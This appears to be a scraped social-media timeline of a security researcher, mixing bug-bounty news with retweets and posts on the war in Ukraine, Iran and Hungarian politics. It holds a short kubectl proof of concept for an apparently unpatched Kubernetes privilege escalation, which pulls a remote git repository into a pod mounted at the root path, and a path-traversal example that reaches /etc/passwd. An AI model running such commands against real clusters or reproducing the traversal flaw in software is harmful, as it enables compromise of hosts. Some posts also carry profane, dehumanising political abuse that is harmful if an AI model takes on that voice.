@GoogleVRP I'm extra proud of this, as the work was started based on my proposal. Congrats everyone, nice to see Cloud VRP going live!
English
Rad Imre
32 posts
We are happy to announce the launch of the Google Cloud Vulnerability Reward Program! The Cloud VRP is specifically dedicated to products and services that are part of Google Cloud. ☁️ 🐞 🤑
cloud.google.com/blog/products/…
English
And an article about two related projects I've been working on:
bughunters.google.com/blog/666987474…
English
Yes, this is a yet unpatched privesc in Kubernetes :)
Full context here: irsl.medium.com/sneaky-write-h…
English
Check /tmp/poc @ host:
kubectl apply -f - <<Z
apiVersion: v1
kind: Pod
metadata:
name: x
spec: {containers: [{image: i,name: c,volumeMounts: [{mountPath: /,name: g}]}],volumes: [{name: g,gitRepo: {repository: github.com/irsl/g.git,rev…: main,directory: g/.git}}]}
Z
English
@ImreRad Nice! Do you know, are the k8s security response committee creating a CVE for this?
English
@solonko1648 I find the reactions of many democratic countries shocking and disgusting. I'm happy this mass murderer piece of shit died.
English
in January 2020, Iran shot down a passenger plane of Ukrainian airlines. 176 people died. no one was held responsible. then Iran supplied russia with attack drones for shelling Ukrainian cities. supplied ammunition to the russians for the war against Ukraine. and now the president of Iran has died and we see the reaction of some "luminaries of democracy" who are willing to lick the heels of Iranians and russians, who are open enemies, than to call the things that are happening in Europe by their names. it's pathetic. it's disgusting to look at.
English
One more Russian Su-34 aircraft was shot down by Ukrainian Defenders in the Eastern direction - commander of Ukrainian Air Forces.
Glory!
English
“Putin murdered his political opponent and Trump hasn’t said a word after he said he would encourage Putin to invade our allies. He has, however, posted 20+ times on social media about his legal drama and fake polls.”
–Nikki Haley
Vermont, USA 🇺🇸 English
Ez az ország egy csoda! Sose hidd, hogy mindent láttál, mert az élet rácáfol...
fogyasztobarat.hu/kotelezo-lesz-…
Magyar
A ma lelőtt ruszki Il-76 margójára. A ruszkik hazudnak (jaj de meglepő) a video geolokációja tökéletesen bizonyítja, h Belgorodból Voronezh felé repült. Az az Il-76, amelyik Iránból Belgorobda érkezett, majd onnan indult tovább .Ukrán hadifogolycsere az apátok faszát hazug orkok
Magyar
@splendid_pete I welcome this rejection. No point in negotiating with pro russian scumbags.
English
🇸🇪🇭🇺 Sweden has declined Hungary's request for negotiations regarding its NATO membership bid. Swedish Foreign Minister Tobias Billström turned down Hungarian Prime Minister Viktor Orbán's proposal for discussions.
This development occurs as Turkey nears ratification of Sweden's entry into NATO, leaving Hungary as the remaining NATO member yet to approve Sweden's application. The contrast between Orbán's offer for dialogue and his public criticism of Sweden underscores the intricate relations between the two countries.
politico.eu/article/sweden…
English
Following Russia's massive air attack on Ukraine, US President Joe Biden calls on Congress to "take urgent action" for more aid to Kyiv, stating, "We cannot let Ukraine down."
euromaidanpress.com/2023/12/29/we-…
English
@jpbastyr @0xTib3rius Schrödinger would be having a hard time to decide whether this is a vulnerability in this webapp, or rather in Python itself.
English
@0xTib3rius os.path.join("/some/path/for/app", "downloads", "/etc/passwd") -> '/etc/passwd'
if any of the segments is an absolute path, it starts the traversal from there. no need for ..
English
Are there any security vulnerabilities in this code? If you think there are, please provide a proof of concept and if possible, an explanation.
Assume unauthenticated users are authorized. Negative points to anyone who thinks Python or Flask is a security vulnerability. 🤨
English
@LiveOverflow Certificate pinning is definetely not a best practice, rather an operational risk.
English
Continuing the mobile security topic, here is a bit of a controversial video!
A few years ago I was doing Android App security audits, and sometimes we would report "lack of SSL certificate pinning". Because I enjoy debating the topic on `what is a security issue?`, I used to argue with my colleagues about this 🤬
To me it is generally not an issue. Though there are some nuances in the threat-model and sometimes it can make sense. So I don't consider it generally important, but it's hard arguing against something that is generally regarded as "recommended best practices".
Then I saw a public talk and paper reporting this, and I used it as a scapegoat to discuss my views.
I can also say, that over 5 years later, I still have the same opinion on certificate pinning ;)
English
Write up about the first batch of findings I reported to the Github bug bounty program:
irsl.medium.com/github-bug-bou…
One flaw in Github Actions and a couple in Github CLI. The next article will be about Github Enterprise Server :)
English
@MarioNawfal So Putler just "destroyed" the "terrorist" by giving them more power. Amazing leader!
English
🚨BREAKING: THE COUP IS OVER | WAGNER’S RETREATING
This official statement from Prigozhin, the head of the Wagner group and the leader of this coup, says it all. I don't think anyone expected this:
"They were going to dismantle PMC Wagner. We came out on 23 June to the March of Justice. In a day, we walked to nearly 200km away from Moscow. In this time, we did not spill a single drop of blood of our fighters. Now, the moment has come when blood may spill. That’s why, understanding the responsibility for spilling Russian blood on one of the sides, we are turning back our convoys and going back to field camps according to the plan."
The President of Belarus, Lukashenko, has been in talks with Prigozhin all day and has taken credit for the peace agreement.
Prigozhin accepted the terms of Lukashenko’s agreement and agreed to halt the movement of his forces and return back to his bases.
The agreement also guarantees security for fighters of PMC Wagner.
It seems that the attempted coup has come to an end, and Prigozhin, along with his men, will return to their bases.
Reports of Wagner forces not only leaving Moscow Oblas, but also leaving Rostov.
Russian media reports that criminal cases have already been dropped from Yevgeny Prigozhin and that Prigozhin and his forces will receive FULL IMMUNITY
Restrictions on the movement of vehicles have been lifted from the Voronezh region which saw clashes earlier during the coup.
MY THOUGHTS:
- I did not expect this would end peacefully with a deal as it seemed both sides seemed at the point of no return
- I have no idea how Prigozhin and Putin can both operate in Russia with what just transpired, and I also have no idea what will happen with the war in Ukraine but I wouldn’t be surprised if we see a space deal reached.
- Today was another example of citizen journalism replacing mainstream media with UNBIASED and UNCENSORED live breaking news.
- I am fried, been awake for more than 30 hours, initially doing a space with former Pakistani Prime Minister Imran Khan before shifting to the Coup space which is at 21 hours and counting. Time for me to finally sleep!
English